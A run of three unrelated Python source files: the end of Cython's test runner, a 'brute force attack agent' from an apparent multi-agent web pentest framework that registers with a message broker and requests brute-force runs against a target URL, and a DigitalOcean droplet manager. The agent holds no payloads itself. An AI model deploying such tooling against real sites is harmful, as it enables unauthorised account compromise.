yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just keeping running until timeout. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
agentBruteForce.py
|
#!/usr/bin/env python3
'''
Brute Force Attack Agent
'''
import sys,os
import validators
import re, random
from furl import *
from urllib.parse import urlparse
import time, signal
from multiprocessing import Process
import threading
import stomp
import re
from daemonize import Daemonize
from os.path import basename
from os.path import basename
current_dir = os.path.basename(os.getcwd())
if current_dir == "agents":
sys.path.append('../')
if current_dir == "Kurgan-Framework":
sys.path.append('./')
from libs.STOMP import STOMP_Connector
from libs.FIPA import FIPAMessage
from libs.Transport import Transport
import libs.Utils as utl
import config as cf
from actions.bruteforceAction import BruteForceAction
AGENT_NAME="AgentBruteForce"
AGENT_ID="6"
def agent_status():
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request','All','agent-status','*')
mAction.receive_pkg(mAgent)
def get_infra():
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
toAgent = "AgentWebInfra"
ret = mAction.requestInfo('request',toAgent,'agent-status','*')
mAction.receive_pkg(mAgent)
def get_url_base():
mAgent = Transport()
mAction = BruteForceAction()
toAgent = "MasterAgent"
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request',toAgent,'base-url-target','*')
mAction.receive_pkg(mAgent)
def run_bruteforce():
mAgent = Transport()
mAction = BruteForceAction()
toAgent = "MasterAgent"
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request',toAgent,'run-bruteforce','*')
mAction.receive_pkg(mAgent)
def agent_quit():
mAction = BruteForceAction()
mAgent = Transport()
mAction.set_mAgent(mAgent)
mAction.deregister()
sys.exit(0)
def handler(signum, frame):
print("Exiting of execution...", signum);
agent_quit()
def runAgent():
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
print("Loading " + AGENT_NAME + " ...\n")
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
mAction.registerAgent()
fm = FIPAMessage()
agent_id=[]
while True:
time.sleep(1)
rcv = mAgent.receive_data_from_agents()
if not len(rcv) == 0:
fm.parse_pkg(rcv)
match = re.search("(agent-name(.)+)(\(\w+\))", rcv)
if match:
field = match.group(3).lstrip()
match2 = re.search("\w+",field)
if match2:
agt_id = match2.group(0)
if agt_id in agent_id:
continue
else:
print("agentID: ", agt_id)
agent_id.append(agt_id)
print(rcv)
mAction.add_available_agent(agt_id)
break
else:
print(rcv)
print("Available Agents: ", mAction.get_available_agents())
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
mAction.cfp("run-bruteforce", "*")
msg_id=[]
while True:
time.sleep(1)
rcv = mAgent.receive_data_from_agents()
if not len(rcv) == 0:
fm.parse_pkg(rcv)
match = re.search("message-id:(.\w+\-\w+)", rcv)
if match:
message_id = match.group(1).lstrip()
if message_id in msg_id:
continue
else:
msg_id.append(message_id)
#print(rcv)
mAgent.zera_buff()
break
else:
continue
#print(rcv)
p = Process(target= get_url_base())
p.start()
p.join(3)
def show_help():
print("Kurgan MultiAgent Framework version ", cf.VERSION)
print("Usage: python3 " + __file__ + " <background|foreground>")
print("\nExample:\n")
print("python3 " + __file__ + " background")
exit(0)
def run(background=False):
if background == True:
pid = os.fork()
if pid:
p = basename(sys.argv[0])
myname, file_extension = os.path.splitext(p)
pidfile = '/tmp/%s.pid' % myname
daemon = Daemonize(app=myname, pid=pidfile, action=runAgent)
daemon.start()
print("Agent Loaded.")
else:
runAgent()
def main(args):
if args[0] == "foreground":
run(background=False)
else:
if args[0] == "background":
run(background=True)
else:
show_help()
exit
exit
if __name__ == '__main__':
if len(sys.argv) == 1:
show_help()
else:
main(sys.argv[1:])
|
droplet.py
|
from __future__ import annotations
from dataclasses import dataclass, field
from ..digitaloceanapi.droplets import Droplets
from ..digitaloceanapi.volumes import Volumes
from .action import *
from .snapshot import *
from .size import *
from .volume import *
from .account import *
from ..common.cloudapiexceptions import *
import json
import threading
import time
import re
@dataclass
class DropletSnapshotAttributes:
id: int = None
name: str = None
distribution: str = None
slug: str = None
public: bool = None
regions: list = field(default_factory=list)
created_at: str = None
min_disk_size: int = None
type: str = None
size_gigabytes: float = None
class DropletSnapshot:
def __init__(self):
self.attributes = DropletSnapshotAttributes()
class DropletManager:
def __init__(self):
self.dropletapi = Droplets()
self.smanager = SnapshotManager()
self.amanager = ActionManager()
self.account_manager=AccountManager()
def check_limit(self):
droplet_limit = self.account_manager.droplet_limit()
if not len(self.retrieve_all_droplets()) < droplet_limit:
raise ErrorAccountDropletLimitReached
(
f"You have reached your droplet limit of {droplet_limit}"
)
def is_valid_droplet_name(self,droplet_name):
#Double check hostname for valid chars
re_is_valid_hostname=re.compile('^[a-zA-Z0-9.-]+$').search
if not bool(re_is_valid_hostname(droplet_name)):
raise ErrorDropletNameContainsInvalidChars(f"\"{droplet_name}\" is not a valid hostname, droplet names must contain only (a-z, A-Z, 0-9, . and -)")
def create_new_droplet(
self,
name,
region,
size,
image,
ssh_keys=[],
backups=None,
ipv6=None,
private_networking=None,
vpc_uuid=None,
user_data=None,
monitoring=None,
volumes=[],
tags=[],
):
arguments = locals()
del arguments["self"]
self.is_valid_droplet_name(arguments['name'])
self.check_limit()
newdroplet = Droplet()
newdroplet.arguments = DropletArguments(**arguments)
response = self.dropletapi.create_new_droplet(**arguments)
if response:
#
droplet_data = dict(json.loads(response.content.decode("utf-8"))["droplet"])
newdroplet.attributes = DropletAttributes(**droplet_data)
else:
raise Exception(f"Could not create droplet {name}, {response.content}")
return newdroplet
def retrieve_droplet_by_id(self, id):
"""
Returns a Droplet object containing attributes for a droplet with id.
Args:
id ([type]): [description]
Returns:
[Droplet]:A droplet object containing attributes for a droplet with object id.
"""
if not self.does_droplet_id_exist(id):
raise ErrorDropletNotFound(f"Droplet with id:{id} does not exists")
newdroplet = Droplet(status="retrieve")
response = self.dropletapi.retrieve_droplet_by_id(id)
if response:
content = json.loads(response.content.decode("utf-8"))
droplet_data = dict(content["droplet"])
newdroplet.attributes = DropletAttributes(**droplet_data)
return newdroplet
def retrieve_droplets_by_name(self, name):
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if droplet.attributes.name == name:
return_droplets.append(droplet)
return return_droplets
def retrieve_all_droplets(self):
"""
Returns an array of Droplet objects, one for each droplet in digitalocean account.
Returns:
[type]: [description]
"""
# Build list of droplets from api, but take in to account possible pagination.
droplet_list = []
page, per_page = 1, 10
response = self.dropletapi.list_all_droplets(page=page, per_page=per_page)
content = json.loads(response.content.decode("utf-8"))
droplet_list.extend(content["droplets"])
try:
while content["links"]["pages"]["next"]:
page = page + 1
response = self.dropletapi.list_all_droplets(
page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
droplet_list.extend(content["droplets"])
except KeyError:
pass
# Build and return that Droplet object array.
droplet_objects = []
for droplet_item in droplet_list:
newdroplet = Droplet(status="retrieve")
newdroplet.attributes = DropletAttributes(**droplet_item)
droplet_objects.append(newdroplet)
return droplet_objects
# def retrieve_all_droplets_by_tag(self, tag_name=None):
# """
# Returns an array of Droplet objects, one for each droplet in digitalocean account.
#
# Returns:
# [type]: [description]
# """
#
# If no tag has been provided, return no droplets
# if tag_name == None:
# return []
# Build list of droplets from api, but take in to account possible pagination.
# droplet_list = []
# page, per_page = 1, 10
# response = self.dropletapi.list_all_droplets_by_tag(
# tag_name=tag_name, page=page, per_page=per_page
# )
# content = json.loads(response.content.decode("utf-8"))
# droplet_list.extend(content["droplets"])
# try:
# while content["links"]["pages"]["next"]:
# page = page + 1
# response = self.dropletapi.list_all_droplets(
# page=page, per_page=per_page
# )
# content = json.loads(response.content.decode("utf-8"))
# droplet_list.extend(content["droplets"])
# except KeyError:
# pass
# Build and return that Droplet object array.
# droplet_objects = []
# for droplet_item in droplet_list:
# newdroplet = Droplet(status="retrieve")
# newdroplet.attributes = DropletAttributes(**droplet_item)
# droplet_objects.append(newdroplet)
# return droplet_objects
def retrieve_droplets_with_only_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if set(list(tag)) == set(droplet.attributes.tags):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
raise ErrorDropletNotFound(
f"No droplets containing all tags: {tag} were found."
)
def delete_droplets_with_only_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_only_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
except:
pass
def retrieve_droplets_with_all_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if set(list(tag)).issubset(set(droplet.attributes.tags)):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
raise ErrorDropletNotFound(
f"No droplets containing all tags: {tag} were found."
)
def delete_droplets_with_all_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_all_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
except:
pass
def retrieve_droplets_with_any_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if not set(list(tag)).isdisjoint(set(droplet.attributes.tags)):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
raise ErrorDropletNotFound(
f"No droplets containing all tags: {tag} were found."
)
def delete_droplets_with_any_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_any_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
except:
pass
def delete_droplet(self, droplet: Droplet):
if not droplet.deleted==False:
raise ErrorDropletNotFound(f"{droplet.attributes.id} was already deleted")
self.delete_droplet_by_id(droplet.attributes.id)
droplet.deleted=True
def delete_droplet_by_id(self, id):
if self.does_droplet_id_exist(id):
response = self.dropletapi.delete_droplet_id(id)
#def delete_droplets_by_tag(self, tag_name=None):
# if not tag_name == None:
# response = self.dropletapi.delete_droplet_tag(tag_name=tag_name)
def does_droplet_id_exist(self, id):
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if str(droplet.attributes.id) == str(id):
return True
return False
@dataclass
class DropletAttributes:
id: int = None
name: str = None
memory: int = None
vcpus: int = None
disk: int = None
locked: bool = None
created_at: str = None
status: str = None
backup_ids: list = field(default_factory=list)
snapshot_ids: list = field(default_factory=list)
features: list = field(default_factory=list)
region: object = field(default_factory=list)
image: object = field(default_factory=list)
size: object = field(default_factory=list)
size_slug: str = None
networks: object = field(default_factory=list)
kernel: object = field(default_factory=list)
next_backup_window: object = field(default_factory=list)
tags: list = field(default_factory=list)
volume_ids: list = field(default_factory=list)
vpc_uuid: list = field(default_factory=list)
@dataclass
class DropletArguments:
name: str = None
region: str = None
size: str = None
image: object = None
ssh_keys: list = field(default_factory=list)
backups: bool = None
ipv6: bool = None
private_networking: bool = None
vpc_uuid: str = None
user_data: str = None
monitoring: bool = None
volumes: list = field(default_factory=list)
tags: list = field(default_factory=list)
#@dataclass
#class DropletLastAction:
# id: int = None
# status: str = None
# type: str = None
# started_at: str = None
# completed_at: str = None
# resource_id: int = None
# resource_type: str = None
# region: object = None
# region_slug: str = None
class Droplet:
def __init__(self, status=None):
self.arguments = DropletArguments()
self.attributes = DropletAttributes()
self.lastaction:Action = None
self.attributes.status = status
self.dropletapi = Droplets()
self.volumeapi = Volumes()
self.action_manager = ActionManager()
self.size_manager = SizeManager()
self.volume_manager = VolumeManager()
self.snapshot_manager = SnapshotManager()
self.droplet_manager = DropletManager()
self.update_on_active_status()
self.deleted=False
def update(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
"""
Updates the Droplet attributes data class with the latest droplet information at digital ocean.
"""
response = self.dropletapi.retrieve_droplet_by_id(self.attributes.id)
if response:
content = json.loads(response.content.decode("utf-8"))
droplet_data = dict(content["droplet"])
self.attributes = DropletAttributes(**droplet_data)
def update_on_active_status(self):
"""
A freshly created droplet will need time to completely boot up and be active.
Information like IP addresses are not available untill the droplet is active.
Here we start a background thread that waits for the droplet to become active and then update the droplet attributes.
"""
def update_status():
while not self.attributes.status == "active":
if self.attributes.status == None:
time.sleep(10)
elif self.attributes.status == "new":
self.update()
time.sleep(10)
else:
break
thread = threading.Thread(target=update_status, args=())
thread.start()
###### Do we need to update droplet action, if action already updates itself
# def update_droplet_action(self):
# """
# Updates the Droplet lastaction data class with the latest droplet action information at digital ocean.
# """
# response = self.dropletapi.retrieve_droplet_action(
# self.attributes.id, self.lastaction.id
# )
# if response:
# content = json.loads(response.content.decode("utf-8"))
# action_data = dict(content["action"])
# self.lastaction = DropletLastAction(**action_data)
# def update_on_active_action(self):
# """
# A freshly created droplet will need time to completely boot up and be active.
# Information like IP addresses are not available untill the droplet is active.
# Here we start a background thread that waits for the droplet to become active and then update the droplet attributes.
# """
# def update_action():
# while (self.lastaction.status == None) or (
# self.lastaction.status == "in-progress"
# ):
# if not self.lastaction.status in ["completed", "errored"]:
# time.sleep(10)
# self.update_droplet_action()
# else:
# break
# if self.lastaction.status == "errored":
# raise ErrorActionFailed(
# f"Action {self.attributes.id},{self.attributes.type} failed"
# )
#
# thread = threading.Thread(target=update_action, args=())
# thread.start()
def reboot(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.reboot_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def powercycle(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.powercycle_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def shutdown(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.shutdown_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def poweroff(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.poweroff_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def poweron(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.poweron_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def rebuild(self, image):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.rebuild_droplet(droplet_id, image)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def rename(self, name):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.droplet_manager.is_valid_droplet_name(name)
droplet_id = self.attributes.id
response = self.dropletapi.rename_droplet(droplet_id, name)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def create_snapshot(self, name):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
response = self.dropletapi.create_snapshot_from_droplet(id, name)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action(ActionAttributes(**action_data))
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
#print(newaction.attributes.started_at)
#print(newaction.attributes.completed_at)
snapshot_objects=self.retrieve_snapshots()
for snapshot_object in snapshot_objects:
if (snapshot_object.attributes.name==name) and (snapshot_object.attributes.created_at==newaction.attributes.started_at):
return snapshot_object
return None
def restore_droplet(self, image_id):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
response = self.dropletapi.restore_droplet(id, image_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action(ActionAttributes(**action_data))
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def resize_droplet(self, slug_size, disk_resize=False):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
# OK, if you try and resize to a smaller disk you will fail.
desired_size = self.size_manager.retrieve_size(slug_size)
target_disk_size = desired_size.attributes.disk
current_disk_size = self.attributes.disk
if target_disk_size < current_disk_size:
raise ErrorDropletResizeDiskError(
"You can't resize to a smaller disk, resize to same disk size with different RAM memory instead"
)
id = self.attributes.id
response = self.dropletapi.resize_droplet(
id, slug_size, disk_resize=disk_resize
)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
self.poweron()
def delete(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.dropletapi.delete_droplet_id(self.attributes.id)
self.deleted=True
def retrieve_snapshots(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
snapshot_list = []
page, per_page = 1, 10
response = self.dropletapi.list_snapshots_for_droplet(
id=id, page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
snapshot_list.extend(content["snapshots"])
try:
while content["links"]["pages"]["next"]:
page = page + 1
response = self.dropletapi.list_snapshots_for_droplet(
id=id, page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
snapshot_list.extend(content["snapshots"])
except KeyError:
pass
#print(snapshot_list)
# Build and return that Snapshot object array.
dropletsnapshot_objects = []
for snapshot_item in snapshot_list:
newdropletsnapshot = DropletSnapshot()
newdropletsnapshot.attributes = DropletSnapshotAttributes(**snapshot_item)
dropletsnapshot_objects.append(newdropletsnapshot)
return dropletsnapshot_objects
def retrieve_snapshot_by_id(self,snapshot_id):
snapshots=self.retrieve_snapshots()
for snapshot in snapshots:
if snapshot.attributes.id==snapshot_id:
return snapshot
return None
def retrieve_associated_volumes(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.update()
volume_ids = self.attributes.volume_ids
# build volume objects and add to list
volume_objects = []
for volume_id in volume_ids:
newvolume = self.volume_manager.retrieve_volume_by_id(volume_id)
volume_objects.append(newvolume)
return volume_objects
def count_associated_volumes(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
volumes = self.retrieve_associated_volumes()
return len(volumes)
def retrieve_associated_volume_snapshots(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.update()
volume_snapshot_ids = self.attributes.snapshot_ids
# build volume objects and add to list
volume_snapshot_objects = []
for volume_snapshot_id in volume_snapshot_ids:
newvolume_snapshot = self.snapshot_manager.retrieve_snapshot_id(
volume_snapshot_id
)
volume_snapshot_objects.append(newvolume_snapshot)
return volume_snapshot_objects
def count_associated_volume_snapshots(self):
if not self.deleted==False:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
volume_snapshots = self.retrieve_associated_volume_snapshots()
return len(volume_snapshots)
def attach_a_volume(self, target_volume:Volume):
# Must check if the target_volume is in the same region
if not self.attributes.region == target_volume.attributes.region:
raise ErrorNotSameRegion(
f"Volume {target_volume.attributes.id} not is same regions as Droplet {self.attributes.id}"
)
# Only 7 volumes allowed to be attached per droplet.
self.update()
if not self.count_associated_volumes() <=7 :
raise ErrorDropletAttachedVolumeCountAlreadAtLimit(
